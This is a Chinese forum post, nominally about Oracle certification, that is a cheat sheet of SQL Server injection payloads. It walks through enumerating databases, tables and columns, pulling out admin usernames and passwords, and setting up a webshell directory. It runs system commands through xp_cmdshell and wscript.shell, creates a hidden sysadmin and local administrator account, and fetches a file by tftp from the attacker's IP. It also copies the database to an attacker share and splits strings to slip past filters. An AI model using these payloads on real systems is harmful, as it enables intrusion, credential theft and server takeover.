我考网社区 › Oracle认证 › oracle认证考试SQL注射语句解析二

会计考友 发表于 2012-8-4 13:54:49

oracle认证考试SQL注射语句解析二

oracle认证考试SQL注射语句解析二
创建一个虚拟目录E盘：
;declare @o int exec sp_oacreate ‘wscript.shell’， @o out exec sp_oamethod
@o， ‘run’， NULL，‘ cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w “默认Web站点”
-v “e”，“e：\”’--
访问属性：（配合写入一个webshell）
declare @o int exec sp_oacreate ‘wscript.shell’， @o out exec sp_oamethod
@o， ‘run’， NULL，‘ cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a
w3svc/1/ROOT/e +browse’
爆库 特殊技巧：：\=‘\’ 或者把/和\ 修改%5提交
如何得到SQLSERVER某个数据库中所有表的表名？
--------------------------------------------------------------------------------
用户表：
select name from sysobjects where xtype = ‘U’;
系统表：
select name from sysobjects where xtype = ‘S’;
所有表：
select name from sysobjects where xtype = ‘S’ or xtype = ‘U’;
--------------------------------------------------------------------------------
and 0《》（select top 1 paths from newtable）--
得到库名（从1到5都是系统的id，6以上才可以判断）
and 1=（select name from master.dbo.sysdatabases where dbid=7）--
and 0《》（select count（*） from master.dbo.sysdatabases where name》1 and
dbid=6）
依次提交 dbid = 7，8，9.。。. 得到更多的数据库名
and 0《》（select top 1 name from bbs.dbo.sysobjects where xtype=‘U’） 暴到一个表
假设为 admin
and 0《》（select top 1 name from bbs.dbo.sysobjects where xtype=‘U’ and name
not in （‘Admin’）） 来得到其他的表。
and 0《》（select count（*） from bbs.dbo.sysobjects where xtype=‘U’ and
name=‘admin’
and uid》（str（id））） 暴到UID的数值假设为18779569 uid=id
and 0《》（select top 1 name from bbs.dbo.syscolumns where id=18779569）
得到一个admin的一个字段，假设为 user_id
and 0《》（select top 1 name from bbs.dbo.syscolumns where id=18779569 and
name not in
（‘id’，。。.）） 来暴出其他的字段
and 0《（select user_id from BBS.dbo.admin where username》1） 可以得到用户名
依次可以得到密码。。。。。假设存在user_id username ，password 等字段
and 0《》（select count（*） from master.dbo.sysdatabases where name》1 and
dbid=6）
and 0《》（select top 1 name from bbs.dbo.sysobjects where xtype=‘U’） 得到表名
and 0《》（select top 1 name from bbs.dbo.sysobjects where xtype=‘U’ and name
not in（‘Address’））
and 0《》（select count（*） from bbs.dbo.sysobjects where xtype=‘U’ and
name=‘admin’ and uid》（str（id））） 判断id值
and 0《》（select top 1 name from BBS.dbo.syscolumns where id=773577794） 所有字段
？id=-1 union select 1，2，3，4，5，6，7，8，9，10，11，12，13，* from admin
？id=-1 union select 1，2，3，4，5，6，7，8，*，9，10，11，12，13 from admin
（union，access也好用）
得到WEB路径
;create table ［dbo］。［swap］ （［swappass］［char］（255））;--
and （select top 1 swappass from swap）=1--
;Create TABLE newtable（id int IDENTITY（1，1），paths varchar（500）） Declare
@test varchar（20） exec master..xp_regread @rootkey=‘HKEY_LOCAL_MACHINE’，
@key=‘SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\’，
@value_name=‘/’， values=@test OUTPUT insert into paths（path）
values（@test）--
;use ku1;--
;create table cmd （str image）;-- 建立image类型的表cmd
存在xp_cmdshell的测试过程：
;exec master..xp_cmdshell ‘dir’
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
;exec master.dbo.sp_password null，jiaoniang$，1866574;--
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_cmdshell ‘net user jiaoniang$ 1866574 /workstations：*
/times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;--
;exec master.dbo.xp_cmdshell ‘net localgroup administrators jiaoniang$
/add’;--
exec master..xp_servicecontrol ‘start’， ‘schedule’ 启动服务
exec master..xp_servicecontrol ‘start’， ‘server’
; DECLARE @shell INT EXEC SP_OACreate ‘wscript.shell’，@shell OUTPUT EXEC
SP_OAMETHOD @shell，‘run’，null， ‘C：\WINNT\system32\cmd.exe /c net user
jiaoniang$ 1866574 /add’
;DECLARE @shell INT EXEC SP_OACreate ‘wscript.shell’，@shell OUTPUT EXEC
SP_OAMETHOD @shell，‘run’，null， ‘C：\WINNT\system32\cmd.exe /c net
localgroup administrators jiaoniang$ /add’
‘; exec master..xp_cmdshell ’tftp -i youip get file.exe‘-- 利用TFTP上传文件
;declare @a sysname set @a=’xp_‘+’cmdshell‘ exec @a ’dir c：\‘
;declare @a sysname set @a=’xp‘+’_cm’+’dshell‘ exec @a ’dir c：\‘
;declare @a;set @a=db_name（）;backup database @a to
disk=’你的IP你的共享目录bak.dat‘
如果被限制则可以。
select * from openrowset（’sqloledb‘，’server‘;’sa‘;’‘，’select ‘’OK！‘’ exec
master.dbo.sp_addlogin hax‘）
查询构造：
Select * FROM news Where id=。。. AND topic=。。. AND 。。.。。
admin’and 1=（select count（*） from ［user］ where username=‘victim’ and
right（left（userpass，01），1）=‘1’） and userpass 《》‘
select 123;--
;use master;--
：a’ or name like ‘fff%’;-- 显示有一个叫ffff的用户哈。
and 1《》（select count（email） from ［user］）;--
;update ［users］ set email=（select top 1 name from sysobjects where
xtype=‘u’ and status》0） where name=‘ffff’;--
;update ［users］ set email=（select top 1 id from sysobjects where xtype=‘u’
and name=‘ad’） where name=‘ffff’;--
‘;update ［users］ set email=（select top 1 name from sysobjects where
xtype=’u‘ and id》581577110） where name=’ffff‘;--
’;update ［users］ set email=（select top 1 count（id） from password） where
name=‘ffff’;--
‘;update ［users］ set email=（select top 1 pwd from password where id=2）
where name=’ffff‘;--
’;update ［users］ set email=（select top 1 name from password where id=2）
where name=‘ffff’;--
上面的语句是得到数据库中的第一个用户表，并把表名放在ffff用户的邮箱字段中

查看完整版本: oracle认证考试SQL注射语句解析二